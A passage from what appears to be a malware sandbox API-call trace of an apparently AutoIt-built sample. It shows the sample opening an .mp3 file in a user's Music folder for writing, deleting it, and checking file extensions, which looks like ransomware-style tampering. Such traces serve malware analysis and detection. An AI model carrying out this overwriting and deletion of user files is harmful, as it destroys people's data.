(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.380] CharLowerBuffW (in: lpsz="byte[71805]", cchLength=0xb | out: lpsz="byte[71805]") returned 0xb [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.380] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.380] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0037.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.381] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.381] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da1e8 [0037.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da1e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.381] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.382] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.384] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.384] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4rukxk6sjcr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.384] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.385] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.385] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.385] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.385] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.385] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.385] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.385] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.385] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.385] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.385] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.385] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.386] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.386] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.386] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFilePart=0x0) returned 0x33 [0037.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0x15fec460, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0x7c2240 [0037.386] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4rukxk6sjcr.mp3")) returned 1 [0037.387] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0x15fec460, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 0 [0037.387] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.388] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.389] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.389] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.389] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.389] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.389] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.389] PeekMessageW (in: 